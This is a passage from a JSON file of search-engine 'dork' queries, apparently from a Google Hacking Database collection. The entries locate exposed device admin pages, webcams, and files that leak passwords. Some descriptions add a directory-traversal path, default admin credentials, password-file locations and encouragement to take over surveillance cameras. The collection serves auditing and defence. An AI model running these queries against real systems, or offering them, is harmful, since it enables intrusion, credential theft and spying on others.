browser anywhere you have an Internet connection; and even on wireless devices. Your GroupWise system can be set up on, Linux, Windows, or any combination of these operating systems.\"", "submited": "2004-12-19", "request": "intitle:\"Novell Web Services\" intext:\"Select a service and a language.\"", "id": 779}, {"short description": "ext:php intext:\"Powered by phpNewMan Version\"", "long description": "PHP News Manager is a multi-platform compatible solution for managing websites and multi-user access. Features weekly poll management, gallery management, partners list management, public news support, and a lot more. PHP News Manager is vulnerable to a directory traversal problem. path/to/news/browse.php?clang=../../../../../../file/i/want", "submited": "2004-12-19", "request": "ext:php intext:\"Powered by phpNewMan Version\"", "id": 780}, {"short description": "intitle:\"Cayman-DSL.home\"", "long description": "Cayman DSL modems. Many Cayman units have a weakness where even if remote administration is disabled, some older firmwares will still allow validation if proper login credentials are supplied. In many cases, simply hitting enter will be enough to authenticate. It's worth noting, many of the vulnerable devices also support telnet right out of the box, as opposed to the linksys models which require a firmware patch.", "submited": "2004-12-19", "request": "intitle:\"Cayman-DSL.home\"", "id": 781}, {"short description": "intitle:\"Index of /CFIDE/\" administrator", "long description": "With ColdFusion, you can build and deploy powerful web applications and web services with far less training time and fewer lines of code than ASP, PHP, and JSP.The search that pulls up directory listings we probably shouldn't be seeing.. entering the 'administrator' directory brings up a ColdFusion login screen", "submited": "2004-12-19", "request": "intitle:\"Index of /CFIDE/\" administrator", "id": 782}, {"short description": "intitle:\"Athens Authentication Point\"", "long description": "Athens is an Access Management system for controlling access to web based subscription services. It offers:    * secure single username access to multiple web-based access controlled services    * devolved administration facilities at organisation level    * remote access user accounts    * encrypted account bulk upload facilities    * scalable services with 3 million accounts    * replication facilities at several separate physical locations, offering a resilient authentication service", "submited": "2004-12-19", "request": "intitle:\"Athens Authentication Point\"", "id": 783}, {"short description": "ext:ini eudora.ini", "long description": "Well, this is the configuration file for Eudora...may contain sensitive information like pop servers, logins and encypted passwords sometimes.", "submited": "2004-12-19", "request": "ext:ini eudora.ini", "id": 784}, {"short description": "inurl:preferences.ini \"[emule]\"", "long description": "This finds the emule configuration file which contains some general and proxy information.Sometimes proxy user and password are stored.", "submited": "2004-12-19", "request": "inurl:preferences.ini \"[emule]\"", "id": 785}, {"short description": "intitle:index.of abyss.conf", "long description": "These directories reveal the configuration file of the abyss webserver. These files can contain passwords.", "submited": "2004-12-19", "request": "intitle:index.of abyss.conf", "id": 786}, {"short description": "intitle:Login intext:\"RT is Copyright\"", "long description": "RT is an enterprise-grade ticketing system which enables a group of people to intelligently and efficiently manage tasks, issues, and requests submitted by a community of users.Versions including 2.0.13 are vulnerable to injection, check outSecurityFocus BID 7509", "submited": "2004-12-19", "request": "intitle:Login intext:\"RT is Copyright\"", "id": 787}, {"short description": "intext:\"\"BiTBOARD v2.0\" BiTSHiFTERS Bulletin Board\"", "long description": "The bitboard2 is a board that need no database to work. So it is useful for webmaster that have no access to a sql database. The password file can be retrieve from/admin/data_passwd.dat", "submited": "2004-12-19", "request": "intext:\"\"BiTBOARD v2.0\" BiTSHiFTERS Bulletin Board\"", "id": 788}, {"short description": "intitle:\"welcome.to.squeezebox\"", "long description": "squeezebox is the easiest way for music lovers to enjoy high-quality playback of their whole digital music collection. Stream music from your computer to anywhere in your home. Works with iTunes and provides a powerful web interface for control from any computer on your network.This is neat, on top of giving out all sorts of enumeration information, it also allows one to paruse the music collection on the box, as well as listen if you install the aplet. Way cool.", "submited": "2004-12-19", "request": "intitle:\"welcome.to.squeezebox\"", "id": 789}, {"short description": "allinurl:\"/*/_vti_pvt/\" | allinurl:\"/*/_vti_cnf/\"", "long description": "Frontpage extensions for Unix ? So be it..", "submited": "2004-12-29", "request": "allinurl:\"/*/_vti_pvt/\" | allinurl:\"/*/_vti_cnf/\"", "id": 790}, {"short description": "", "long description": "some of the sites are very, very interesting - try a search substituting site:gov instead of site:com, or try site:edu or site:org or site:fm.  Anyway, camera servers made by Axis Video, you can look up administrator manuals online via the following search string (guess what you might find there?):site:com inurl:axis video server manualsCan you say default UID and PW?What's really interesting is if you look hard enough; you can find cameras within government and educational labs; airport surveillance; even some stretches of I65 in the US (for those of you close to the Ohio River area).Anyway this search string gets you into the server; from there you can have many controls or few controls over the cameras (including zoom, pan, and iris).  There is much to see and most of the cameras have easy acccess to admin profile via click of a button - of course from there you have to provide a UID &amp; PW.  But read up on the manuals any you may get lucky.Bottom line, if you can control the camera (via admin priv.) you can control what and when the camera &amp; server view as well as what &amp; when they record.  Just a small seed for a possibly big idea - your ambitions may vary.Rate it!  Give me feedback!  I will not learn without some form of criticism...yet despite how insignificant that criticism may make me feel...i enjoy the search for the unseen/unknown knowledge nonetheless...it was worth it.", "submited": "2004-12-08", "request": "", "id": 791}, {"short description": "filetype:cnf inurl:_vti_pvt access.cnf", "long description": "The access.cnf file is a \"weconfigfile\" (webconfig file) used by Frontpage Extentions for Unix. The install script called change_server.sh processes them. These files leak information about the realm name and the full path on the server for it.", "submited": "2004-12-30", "request": "filetype:cnf inurl:_vti_pvt access.cnf", "id": 792}, {"short description": "inurl:\"install/install.php\"", "long description": "This searches for the install.php file. Most results will be a Bulletin board like  Phpbb etc.This will let an attacker install the forum again. There is an exploit available on the Net which lets you see DB info.", "submited": "2004-12-29", "request": "inurl:\"install/install.php\"", "id": 793}, {"short description": "intitle:\"index of\" inurl:ftp (pub | incoming)", "long description": "Adding \"inurl:ftp (pub | incoming)\" to the \"index.of\" searches helps locating ftp websites. This query can easily be narrowed further with additional keywords.", "submited": "2004-12-30", "request": "intitle:\"index of\" inurl:ftp (pub | incoming)", "id": 794}, {"short description": "filetype:blt \"buddylist\"", "long description": "AIM buddylists.", "submited": "2004-12-30", "request": "filetype:blt \"buddylist\"", "id": 795}, {"short description": "intitle:\"index.of\" .diz .nfo last modified", "long description": "File_id.diz is a description file uploaders use to describe packages uploaded to FTP sites. Although rooted in legitimacy, it is used largely by software piracy groups to describe their ill gotten goods. Systems administrators finding file_id.diz in directory listings on their servers may discover their boxes have been hacked and are being used as a distroubtion site for pirated software. .nfo's often contain info on which piracy group the files have passed through on their way to their final resting place. This helps weed out false positives.", "submited": "2004-12-30", "request": "intitle:\"index.of\" .diz .nfo last modified", "id": 796}, {"short description": "intitle:\"Sipura.SPA.Configuration\" -.pdf", "long description": "Query returns configuration pages for online Voice over IP devices. Discloses an obscene amount of information about the target, including most all routing information and access to control user's telephone system.", "submited": "2004-12-30", "request": "intitle:\"Sipura.SPA.Configuration\" -.pdf", "id": 797}, {"short description": "intitle:\"Azureus : Java BitTorrent Client Tracker\"", "long description": "This query shows machines using the Azureus BitTorrent client's built-in tracker - the pages are quite simple in the information they give out, simply a list of active torrents.This information may be useful for people wanting to find active BitTorrent trackers for downloading .torrent files from, or for people wanting to find these trackers to shut them down :)", "submited": "2004-12-30", "request": "intitle:\"Azureus : Java BitTorrent Client Tracker\"", "id": 798}, {"short description": "intitle:\"BNBT Tracker Info\"", "long description": "This query shows pages which summarise activity on BNBT-powered BitTorrent trackers - including all the torrents currently being \"tracked\", the BNBT software version, links to user-lists and 'admin' pages, etc.This is useful to people who want to find active BitTorrent trackers for downloading - including ones which aren't 'public'. It is also useful for people wanting to gain some clues into a tracker's/site's setup. Some versions of BNBT are also vulnerable to a DOS attack. People targetting BitTorrent trackers because of the questionable legality of their general usage may also find this query useful!", "submited": "2004-12-30", "request": "intitle:\"BNBT Tracker Info\"", "id": 799}, {"short description": "intitle:\"PHPBTTracker Statistics\" | intitle:\"PHPBT Tracker Statistics\"", "long description": "This query shows pages which summarise activity on PHPBT-powered BitTorrent trackers - all the torrents currently being \"tracked\".This is useful to people who want to find active BitTorrent trackers for downloading - including ones which aren't 'public'. It is also useful for people wanting to gain some clues into a tracker's/site's setup. People targetting BitTorrent trackers because of the questionable legality of their general usage may also find this query useful!Often, the URL involved can be changed to access the configuration / installation / deletion script.. which are obviously *not* intended for public access, even if the statistics page is.", "submited": "2004-12-30", "request": "intitle:\"PHPBTTracker Statistics\" | intitle:\"PHPBT Tracker Statistics\"", "id": 800}, {"short description": "\"Powered by WordPress\" -html filetype:php -demo -wordpress.org -bugtraq", "long description": "Query: \"Powered by WordPress\" -html filetype:php -demo -wordpress.org -bugtraqBackground: WordPress is a blogging software which is vulnerable to a few SQL injection queries.http://securityfocus.com/bid/12066/exploit/", "submited": "2005-01-02", "request": "\"Powered by WordPress\" -html filetype:php -demo -wordpress.org -bugtraq", "id": 801}, {"short description": "intitle:upload inurl:upload intext:upload -forum -shop -support -w3c", "long description": "The search reveals server upload portals.An attacker can use server space for his own benefit.", "submited": "2005-01-01", "request": "intitle:upload inurl:upload intext:upload -forum -shop -support -w3c", "id": 802}, {"short description": "intitle:\"SpeedStream * Management Interface\"", "long description": "a lot of Speed stream routers :)", "submited": "2005-01-08", "request": "intitle:\"SpeedStream * Management Interface\"", "id": 803}, {"short description": "intitle:\"HFS /\" +\"HttpFileServer\"", "long description": "\"The HttpFileServer is a Java based mechanism for providing web access to a set of files on a server. This is very similar to Apache Directory Indexing but provides the ability to upload files as well.\" http://johnny.ihackstuff.com/index.php?name=PNphpBB2&amp;file=viewtopic&amp;t=1516", "submited": "2005-01-05", "request": "intitle:\"HFS /\" +\"HttpFileServer\"", "id": 804}, {"short description": "inurl:\"next_file=main_fs.htm\" inurl:img inurl:image.cgi", "long description": "Linksys Wireless-G web cams.", "submited": "2004-12-30", "request": "inurl:\"next_file=main_fs.htm\" inurl:img inurl:image.cgi", "id": 805}, {"short description": "\"There are no Administrators Accounts\" inurl:admin.php -mysql_fetch_row", "long description": "This is a more specific search for the vulnerable PhpNuke index already seen on this website.PhpNuke asks you to set up an admin account when it is first installed. This search is a list of people who never set up that account! It will take you directly to the administrator registration of a vulnerable server. The -mysql_fetch_row will remove listings where SQL is simply broken.", "submited": "2004-12-27", "request": "\"There are no Administrators Accounts\" inurl:admin.php -mysql_fetch_row", "id": 806}, {"short description": "filetype:ctt Contact", "long description": "This is for MSN Contact lists...", "submited": "2005-01-02", "request": "filetype:ctt Contact", "id": 807}, {"short description": "Peoples MSN contact lists", "long description": "This will give msn contact lists .. modify the \"msn\" to what ever you feel is messenger related", "submited": "2005-01-02", "request": "filetype:ctt \"msn\"", "id": 808}, {"short description": "inurl:servlet/webacc", "long description": "I was playing around on the net when I found a small problem with Novell's WebAcces. With User.lang you can give in you're language as parameter I tried some different stuff there and when I tried so that the URL would be hxxp://www.notsohappyserver.com/servlet/webacc?User.Lang=\"&gt; this link appeared I clicked it and so I found unprotected dirs.In hxxp://www.notsohappyserver.com/com/novell/webaccess/ is a file called WebAccessUninstall.ini and this file contains info like servernames installationpaths and servers context", "submited": "2005-01-06", "request": "inurl:servlet/webacc", "id": 809}, {"short description": "\"Web File Browser\" \"Use regular expression\"", "long description": "This will ask google to search for a php script used to manage files on a server. The script \"Web File Browser\" enables users to change files on the server. The script comes un-protected, which means that anyone who knows the exact path of the php file can have admin access to files on that server.", "submited": "2005-01-07", "request": "\"Web File Browser\" \"Use regular expression\"", "id": 810}, {"short description": "intext:gmail invite intext:http://gmail.google.com/gmail/a", "long description": "This is a dork I did today. At first, I wanted to find out the formula for making one, but ... It got boring, so I just made a dork that finds invites. If you want to get specific, try adding \"+blog\", \"+livejournal\", or , \"+forum\".", "submited": "2005-01-02", "request": "intext:gmail invite intext:http://gmail.google.com/gmail/a", "id": 811}, {"short description": "filetype:cgi transcoder.cgi", "long description": "Digital Video Recorder by SnapStream. It is possible on misconfigured machines to stream video off these devices.", "submited": "2005-01-11", "request": "filetype:cgi transcoder.cgi", "id": 812}, {"short description": "intitle:\"Setup Home\" \"You will need * log in before * * change * settings\"", "long description": "This should reveal Belkin routers. Interestingly, Belkin routers by default have remote administration on, and act as a webserver for administration. Also by default, their password is blank (and the login page helpfuly informs the attacker of this).Once he's in, there's all kinds of annoying stuff he could get into, and it could also be used more blackhackishly to disable security.", "submited": "2005-01-10", "request": "intitle:\"Setup Home\" \"You will need * log in before * * change * settings\"", "id": 813}, {"short description": "\"Index of\" rar r01 nfo Modified 2004", "long description": "New Warez Directory Lists", "submited": "2005-01-09", "request": "\"Index of\" rar r01 nfo Modified 2004", "id": 814}, {"short description": "intitle:\"Network Print Server\" filetype:shtm ( inurl:u_printjobs | inurl:u_server | inurl:a_server | inurl:u_generalhelp | u_printjobs )", "long description": "Axis Network Print Server devices. This search has all the possible urls (more than strictly needed), but those are added in case Google decides to index them in the future.", "submited": "2005-01-12", "request": "intitle:\"Network Print Server\" filetype:shtm ( inurl:u_printjobs | inurl:u_server | inurl:a_server | inurl:u_generalhelp | u_printjobs )", "id": 815}, {"short description": "intitle:\"Network Print Server\" intext:\"http://www.axis.com\" filetype:shtm", "long description": "Axis Network Print Server devices (a better shorter search).", "submited": "2005-01-12", "request": "intitle:\"Network Print Server\" intext:\"http://www.axis.com\" filetype:shtm", "id": 816}, {"short description": "\"pcANYWHERE EXPRESS Java Client\"", "long description": "This search will reveal the java script program that allows someone to access PC Anywhere from, well, anywhere! This should primarily be considered as a frontdoor, as most PC Anywhere servers are password protected. Still this is extremely dangerous to have exposed to the web.", "submited": "2005-01-15", "request": "\"pcANYWHERE EXPRESS Java Client\"", "id": 817}, {"short description": "inurl:\"Activex/default.htm\" \"Demo\"", "long description": "This search will reveal the active X plugin page that allows someone to access PC Anywhere from, well, anywhere! This should primarily be considered as a frontdoor, as most PC Anywhere servers are password protected. Still this is extremely dangerous to have exposed to the web.", "submited": "2005-01-15", "request": "inurl:\"Activex/default.htm\" \"Demo\"", "id": 818}, {"short description": "intitle:\"FTP root at\"", "long description": "This dork will return some FTP root directories. The string can be made more specific by adding additional keywords like password.", "submited": "2005-01-13", "request": "intitle:\"FTP root at\"", "id": 819}, {"short description": "intitle:\"VNC viewer for Java\"", "long description": "VNC (Virtual Network Computing) allows a pc to be controlled remotely over the Internet. These are the password protected but still shouldn't be allowed to be indexed by Google by accident.", "submited": "2005-01-15", "request": "intitle:\"VNC viewer for Java\"", "id": 820}, {"short description": "filetype:torrent torrent", "long description": "Torrent files .. don't expect to find spectacular stuff with this kind of string, this just to shows you can use Google for all kinds of filetypes, not just pdf or html..", "submited": "2005-01-16", "request": "filetype:torrent torrent", "id": 821}, {"short description": "inurl:\"631/admin\" (inurl:\"op=*\") | (intitle:CUPS)", "long description": "Administration pages for CUPS, The Common UNIX Printing System. Most are password protected.", "submited": "2005-01-18", "request": "inurl:\"631/admin\" (inurl:\"op=*\") | (intitle:CUPS)", "id": 822}, {"short description": "PHPhotoalbum Upload", "long description": "Homepage: http://www.stoverud.com/PHPhotoalbum/PHPhotoalbum is a picturegallery script. You can upload pictures directly from your webbrowser. The script generates thumbnails on the fly. Users can comment each picture. View statistics about the pictures. TopXX list. Admin user can delete pictures, comments and albums.", "submited": "2005-01-13", "request": "intitle:\"PHPhotoalbum - Upload\" | inurl:\"PHPhotoalbum/upload\"", "id": 823}, {"short description": "PHPhotoalbum Statistics", "long description": "PHPhotoalbum is a picturegallery script. You can upload pictures directly from your webbrowser. The script generates thumbnails on the fly. Users can comment each picture. View statistics about the pictures. TopXX list. Admin user can delete pictures, comments and albums.", "submited": "2005-01-13", "request": "inurl:PHPhotoalbum/statistics intitle:\"PHPhotoalbum - Statistics\"", "id": 824}, {"short description": "PhotoPost PHP Upload", "long description": "PhotoPost was designed to help you give your users exactly what they want. Your users will be thrilled to finally be able to upload and display their photos for your entire community to view and discuss, all with no more effort than it takes to post a text message to a forum.Over 3,500 web sites are powered by PhotoPost today. These customers trusted our software to simplify their lives as webmasters, and to meet the needs of their users.", "submited": "2005-01-13", "request": "-Login inurl:photopost/uploadphoto.php", "id": 825}, {"short description": "uploadpics.php?did= -forumintext:Generated.by.phpix.1.0? inurl:$mode=album", "long description": "Product: PHPix Version:  1.0Vuln: Directory traversalPHPix is a Web-based photo album viewer written in PHP. It features automatic generation of thumbnails and different resolution files for viewing on the fly. Synnergy Labs has found a flaw within PHPix that allows a user to successfully traverse the file system on a remote host, allowing arbitrary files/folders to be read. http://www.securiteam.com/unixfocus/6G00K0K04K.html", "submited": "2005-01-21", "request": "intext:Generated.by.phpix.1.0? inurl:$mode=album", "id": 826}, {"short description": "XAMPP \"inurl:xampp/index\"", "long description": "XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl. XAMPP is really very easy to install and to use - just download, extract and start. At the moment there are three XAMPP distributions.-allows you to write emails (mercury Mail)-some phpmyadmin are unprotected-security details of the server-maybe some more things  ;-)", "submited": "2005-01-21", "request": "XAMPP \"inurl:xampp/index\"", "id": 827}, {"short description": "intitle:\"Browser Launch Page\"", "long description": "An ActiveX based webcam - so use MS IE", "submited": "2005-01-21", "request": "intitle:\"Browser Launch Page\"", "id": 828}, {"short description": "intext:\"Mail admins login here to administrate your domain.\"", "long description": "Another way to locate Postfix admin logon pages.", "submited": "2005-01-24", "request": "intext:\"Mail admins login here to administrate your domain.\"", "id": 829}, {"short description": "inurl:citrix/metaframexp/default/login.asp? ClientDetection=On", "long description": "Citrix (http://citrix.com) is a web application that allows remote access via a client for companies, institutions, and government agencies to \"published\" folders, files, drives, and applications on the server and often the attached network. There is a XSS vulnerability in a widely used version of their Web Interface. As reported on Securiteam.com:http://www.securiteam.com/securitynews/6X0020K8VW.html A simple test is inlcluded in the advisory.", "submited": "2005-01-20", "request": "inurl:citrix/metaframexp/default/login.asp? ClientDetection=On", "id": 830}, {"short description": "ext:txt inurl:dxdiag", "long description": "This will find text dumps of the DirectX Diag utility. It gives an outline of the hardware of the computer, and goes into quite a bit of detail listing driver versions and such. I can't think of any serious security implacations of this data, but I'll leave it to your imagination.", "submited": "2005-01-22", "request": "ext:txt inurl:dxdiag", "id": 831}, {"short description": "inurl:\"usysinfo?login=true\"", "long description": "Dell OpenManage enables remote execution of tasks such as system configuration, imaging, application installation and support. It also used to track hardware and software inventory, to update configurations, drivers, OS and applications and to proactively monitor and correct fault conditionsDell OpenManage standards include the Common Information Model (CIM), Desktop Management Interface (DMI), Simple Network Management Protocol (SNMP), and Wired for Management (WfM).Another possible search for this is:\"Log in.\" inurl:1311/servlet/", "submited": "2005-01-25", "request": "inurl:\"usysinfo?login=true\"", "id": 832}, {"short description": "inurl:\"/NSearch/AdminServlet\"", "long description": "This search brings up results for Novell NetWare's Web Search Manager.. at best the sites will be password protected, at worst the site will require no authentication - allowing full control over a site's 'virtual search servers'.", "submited": "2005-01-26", "request": "inurl:\"/NSearch/AdminServlet\"", "id": 833}, {"short description": "\"Netware * Home\" inurl:nav.html", "long description": "Rather than submitting various searches for all kinds of NetWare related pages, Novell NetWare's Home Page is a good place to start for profiling the services available on a NetWare powered system. The results will often include all (or at least some) of the following links to different services on a system - including Server Certificates, iFolder, iManager, NetStorage, Enterprise Web Server Management and the Web Search Manager!", "submited": "2005-01-26", "request": "\"Netware * Home\" inurl:nav.html", "id": 834}, {"short description": "intext:\"Error Message : Error loading required libraries.\"", "long description": "This throws up pages which contain \"CGI ERROR\" reports - which include the file (and line number) of the errors occurence, the version of Perl being used, detailed server information (of the form \"Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_ssl/2.8.12 OpenSSL/0.9.6b DAV/1.0.3 PHP/4.3.2 mod_perl/1.26\"), usernames, setup file names, form / query information, port and path information, etc.. perfect for system-profiling!", "submited": "2005-01-26", "request": "intext:\"Error Message : Error loading required libraries.\"", "id": 835}, {"short description": "ext:reg \"username=*\" putty", "long description": "Putty registry entries. Contain username and hostname pairs, as well as type of session (sftp, xterm, etc).", "submited": "2005-01-27", "request": "ext:reg \"username=*\" putty", "id": 836}, {"short description": "allinurl:index.htm?cus?audio", "long description": "This will find webcams made by Sweex, Orite and others. Supports motion detection, ftp, smtp and save to .avi. Needs ActiveX so works for IE/win only ..", "submited": "2005-01-27", "request": "allinurl:index.htm?cus?audio", "id": 837}, {"short description": "intitle:\"edna:streaming mp3 server\" -forums", "long description": "Edna allows you to access your MP3 collection from any networked computer. This software streams your MP3s via HTTP to any MP3 player that supports playing off a remote connection (e.g. Winamp, FreeAmp, Sonique, XMMS).Stats pages were found (by klouw) with:\"edna:*\" intitle:\"edna: Site Statistics\"", "submited": "2005-01-27", "request": "intitle:\"edna:streaming mp3 server\" -forums", "id": 838}, {"short description": "intitle:\"ePowerSwitch Login\"", "long description": "With ePowerSwitch D4 Guard, up to four devices can be individually switched on and off, also with programmed switching states. The activated Guard function ensures exceptionally high equipment availability: continually monitors whether the connected IP-based devices are still active, it can automatically, without user input, reboot any crashed device.", "submited": "2005-01-27", "request": "intitle:\"ePowerSwitch Login\"", "id": 839}, {"short description": "ext:ini Version=4.0.0.4 password", "long description": "The servU FTP Daemon ini file contains setting and session information including usernames, passwords and more. This is a more specific search for ServU passwords base on a previous dork by Cybercide.", "submited": "2005-01-27", "request": "ext:ini Version=4.0.0.4 password", "id": 840}, {"short description": "inurl:orasso.wwsso_app_admin.ls_login", "long description": "Oracle provides a Single Sign-On solution which is quite widely spread as it integrates quite seemlessly into exisitng appllications (as Oracle says).If the link itself shows an empty page, try the directory below.", "submited": "2005-01-27", "request": "inurl:orasso.wwsso_app_admin.ls_login", "id": 841}, {"short description": "inurl:oraweb -site:oraweb.org", "long description": "Oracle administrators tend to naming their servers ora* - maybe because they forget the name of their database all the time.So the Oracle webserver is very often named oraweb.", "submited": "2005-01-27", "request": "inurl:oraweb -site:oraweb.org", "id": 842}, {"short description": "intitle:Group-Office \"Enter your username and password to login\"", "long description": "Group-Office is a Groupware suite containing a base system and different modules. The modules are designed in a way that groups of people can collaborate online.", "submited": "2005-01-27", "request": "intitle:Group-Office \"Enter your username and password to login\"", "id": 843}, {"short description": "inurl:\"8003/Display?what=\"", "long description": "Norton AntiVirus for GatewaysEasily administered from anywhere via an HTML interface, it scans compressed and encoded files at the SMTP gateway, including a nearly unlimited number of file extensions in ZIP, UUENCODE, and MIME formats. Administrators have flexible options for handling infected files, scheduling virus definition updates via LiveUpdate, and generating reports.", "submited": "2005-01-27", "request": "inurl:\"8003/Display?what=\"", "id": 844}, {"short description": "intitle:\"EverFocus.EDSR.applet\"", "long description": "The new EDSR-1600 (16-channel), EDSR-900 (9-channel) and EDSR-600 (6-channel) digital video recorders offer all digital video recording benefits and are easy to install and operate like a custom VCR.  Moreover, the 16 &amp; 9 channel devices are the first Digital Video Recorders with an integrated 16x4 basic matrix function.  Existing multiplexers can be connected via a switch output.  Alarms are managed via external alarm inputs and outputs.", "submited": "2005-01-27", "request": "intitle:\"EverFocus.EDSR.applet\"", "id": 845}, {"short description": "inurl:netscape.ini", "long description": "There's a bunch of interesting info in netscape.ini1. Viewers: which multimedia viewers the firm or people are using2.Cookies3.Address Book4.Mail- If pop3 is used you will see login and password. 5.Java - will tell the attacker if his victim has Java enabled.6.URL History - The last sites visitedURL_1=http://edtech.xxxx.fi/URL_2=C:\\Tx\\ixxx_t3.htmURL_3=http://www.xxx.com/welcome/URL_4=http://xxx.netscape.com7.User Trusted External Applications", "submited": "2005-01-27", "request": "inurl:netscape.ini", "id": 846}, {"short description": "inurl:netscape.hst", "long description": "Netscape Bookmark List/History: So an attacker would be able to locate the bookmark and history list", "submited": "2005-01-27", "request": "inurl:netscape.hst", "id": 847}, {"short description": "inurl:\"bookmark.htm\"", "long description": "Bookmarks for Netscape and various other browsers.", "submited": "2005-01-27", "request": "inurl:\"bookmark.htm\"", "id": 848}, {"short description": "inurl:netscape.hst", "long description": "History for Netscape -  So an attacker can read a user's browsing history.", "submited": "2005-01-27", "request": "inurl:netscape.hst", "id": 849}, {"short description": "\"powered | performed by Beyond Security's Automated Scanning\" -kazaa -example", "long description": "This search finds Beyond Security reports. Beyond Security sells a box which performs automated testing (the product is based on Nessus). The Beyond Security report will help an attacker find vulnerabile services at the attackees site.This dork was found by Jamuse. A cleanup was done by Wolveso. Please note: Both current (feb 2005) results are verifiable as samples - they're linked from pages on the sites they belong to, as sample reports. But you never know when Google might find some real one's to play with ?!", "submited": "2005-02-03", "request": "\"powered | performed by Beyond Security&#039;s Automated Scanning\" -kazaa -example", "id": 850}, {"short description": "intitle:\"EpsonNet WebAssist Rev\"", "long description": "This reveals the Epson Web Assist page (internal to the machine)", "submited": "2005-01-28", "request": "intitle:\"EpsonNet WebAssist Rev\"", "id": 851}, {"short description": "\"SquirrelMail version 1.4.4\" inurl:src ext:php", "long description": "date :Jan 30 2005 this search reveal the src/webmail.php which would allow acrafted URL to include a remote web page. This was assigned CAN-2005-0103by the Common Vulnerabilities and Exposures.-what can possibly be done :*A possible cross site scripting issue exists in src/webmail.php that isonly accessible when the PHP installation is running with register_globalsset to On.*A possible local file inclusion issue was uncovered by one of ourdevelopers involving custom preference handlers. This issue is onlyactive if the PHP installation is running with register_globals set to On.", "submited": "2005-01-30", "request": "\"SquirrelMail version 1.4.4\" inurl:src ext:php", "id": 852}, {"short description": "inurl:na_admin", "long description": "This searches for the admin pages for a \"Network Appliance\" box. An authenticated user could get access to a their data - all of it, in fact up to 100's Tb of it. This is also part of cgi scanning tools like:  http://www.cirt.net/nikto/UPDATES/1.34/scan_database.db", "submited": "2005-02-01", "request": "inurl:na_admin", "id": 853}, {"short description": "intitle:&amp;quot;Connection Status&amp;quot; intext:&amp;quot;Current login&amp;quot;", "long description": "This is an intriguing way of finding various '5861 DMT Routers' - the presence of a web-interface to the router also indicates the presence of a telnet interface to the router!", "submited": "2005-02-02", "request": "intitle:\"Connection Status\" intext:\"Current login\"", "id": 854}, {"short description": "intitle:\"welcome to netware *\" -site:novell.com", "long description": "Novell login portals offering various services storage, printing, email or LDAP access", "submited": "2005-02-03", "request": "intitle:\"welcome to netware *\" -site:novell.com", "id": 855}, {"short description": "intitle:&amp;quot;Brother&amp;quot; intext:&amp;quot;View Configuration&amp;quot; intext:&amp;quot;Brother Industries, Ltd.&amp;quot;", "long description": "Finds a real bunch of Brother printers", "submited": "2005-02-04", "request": "intitle:\"Brother\" intext:\"View Configuration\" intext:\"Brother Industries, Ltd.\"", "id": 856}, {"short description": "filetype:inc mysql_connect OR mysql_pconnect", "long description": "INC files have PHP code within them that contain unencrypted usernames, passwords, and addresses for the corresponding databases.  Very dangerous stuff.  The mysql_connect file is especially dangerous because it handles the actual connection and authentication with the database.", "submited": "2005-02-09", "request": "filetype:inc mysql_connect OR mysql_pconnect", "id": 857}, {"short description": "\"IceWarp Web Mail 5.3.0\" \"Powered by IceWarp\"", "long description": "IceWarp Web Mail 5.3.0Multiple cross-site scripting and HTML injection vulnerabilities.http://www.securityfocus.com/bid/12396/", "submited": "2005-02-07", "request": "\"IceWarp Web Mail 5.3.0\" \"Powered by IceWarp\"", "id": 858}, {"short description": "&amp;quot;Powered by DUpaypal&amp;quot; -site:duware.com", "long description": "Here is another DUware product, DUpaypal. Once you get hold of the database it contains the admin username and password. The default by the way is admin/passwordThe default location for the database is ../_private/DUpaypal.mdb", "submited": "2005-02-07", "request": "\"Powered by DUpaypal\" -site:duware.com", "id": 859}, {"short description": "-site:php.net -\"The PHP Group\" inurl:source  inurl:url ext:pHp", "long description": "scripts to view the source code of PHP scripts running on the server. Can be very interesting if it is also allowed to open  configuration files ;-)", "submited": "2005-02-15", "request": "-site:php.net -\"The PHP Group\" inurl:source  inurl:url ext:pHp", "id": 860}, {"short description": "\"Microsoft CRM : Unsupported Browser Version\"", "long description": "Microsoft CRM Login portal.MS says:Microsoft CRM integrates with Microsoft Office, Microsoft Business Solutions for Financial Management, and other business systems to give employees a complete view of customer information. The ease of integration with Microsoft Office is of particular value enabling staff to access Microsoft CRM information from Microsoft Office Outlook and work online or offline with access to sales functionality.", "submited": "2005-02-15", "request": "\"Microsoft CRM : Unsupported Browser Version\"", "id": 861}, {"short description": "intitle:\"switch login\" \"IBM Fast Ethernet Desktop\"", "long description": "IBM 8275 Model 416 High Performance Ethernet Workgroup Switch", "submited": "2005-02-15", "request": "intitle:\"switch login\" \"IBM Fast Ethernet Desktop\"", "id": 862}, {"short description": "\"Powered by Link Department\"", "long description": "Link management script with advanced yet easy to use admin control panel, fully template driven appearance, static HTML front-end and email notifications.Below the link list a folder 'ld' exists which contains various juicy information like encrypted admin passwords and session data.", "submited": "2005-02-15", "request": "\"Powered by Link Department\"", "id": 863}, {"short description": "\"Powered by MercuryBoard [v1\"", "long description": "Exploit for MercuryBoard:http://www.securityfocus.com/archive/1/389881/2005-02-06/2005-02-12/0Enter the following search:\"Powered by MercuryBoard [v1\"And the exploit does work!", "submited": "2005-02-09", "request": "\"Powered by MercuryBoard [v1\"", "id": 864}, {"short description": "intitle:\"Index of\" sc_serv.conf sc_serv  content", "long description": "This dork lists sc_serv.conf files. These files contain information for Shoutcast servers and often contain cleartext passwords.Original dork: filetype:conf sc_serv.confCleaned by: c0wzClean date: 2005-04-26", "submited": "2005-02-10", "request": "intitle:\"Index of\" sc_serv.conf sc_serv  content", "id": 865}, {"short description": "intitle:\"welcome to mono xsp\"", "long description": "XSD is the demo webserver for the Mono project and allows the execution of ASP.NET on Unix", "submited": "2005-02-15", "request": "intitle:\"welcome to mono xsp\"", "id": 866}, {"short description": "intitle:\"DEFAULT_CONFIG - HP\"", "long description": "High scalable Ethernet switches by HP running in the default configuration", "submited": "2005-02-15", "request": "intitle:\"DEFAULT_CONFIG - HP\"", "id": 867}, {"short description": "intitle:\"web server status\" SSH Telnet", "long description": "simple port scanners for most common ports", "submited": "2005-02-15", "request": "intitle:\"web server status\" SSH Telnet", "id": 868}, {"short description": "intitle:opengroupware.org \"resistance is obsolete\" \"Report Bugs\" \"Username\" \"password\"", "long description": "Open groupware is a comprehensive open source groupware project running on all major platforms.", "submited": "2005-02-15", "request": "intitle:opengroupware.org \"resistance is obsolete\" \"Report Bugs\" \"Username\" \"password\"", "id": 869}, {"short description": "intitle:Linksys site:ourlinksys.com", "long description": "Ourlinksys.com DDNS entries pointing to Linksys web enabled cameras", "submited": 